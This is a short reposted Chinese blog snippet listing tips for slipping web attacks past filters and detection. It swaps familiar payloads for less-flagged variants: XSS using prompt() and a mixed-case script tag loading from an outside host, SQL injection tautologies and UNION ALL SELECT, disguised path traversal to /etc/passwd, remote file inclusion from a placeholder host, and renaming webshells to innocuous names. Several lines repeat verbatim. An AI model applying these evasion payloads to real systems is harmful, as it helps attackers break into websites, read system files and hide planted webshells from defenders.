1 stop using
alert('xss')
,use
prompt('xss');
2 dont do <script> , do <ScRIPT x src=//0x.lv? ;
3 stop using ' or 1=1-- , use ' or 2=2-- ;
4 stop using UNION SELECT , use UNION ALL SELECT ;
5 dont do /etc/passwd , do /foo/../etc/bar/../passwd ;
6 dont use http://xxx.com/r57.txt , use https://xxx.com/lol.txt ;
2 dont do <script> , do <ScRIPT x src=//0x.lv? ;
3 stop using ' or 1=1-- , use ' or 2=2-- ;
4 stop using UNION SELECT , use UNION ALL SELECT ;
5 dont do /etc/passwd , do /foo/../etc/bar/../passwd ;
6 dont use http://xxx.com/r57.txt , use https://xxx.com/lol.txt ;
7 dont call webshell x99.php/shell.aspx or cmd.jsp , call it rofl.php ;
本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/489137,如需转载请自行联系原作者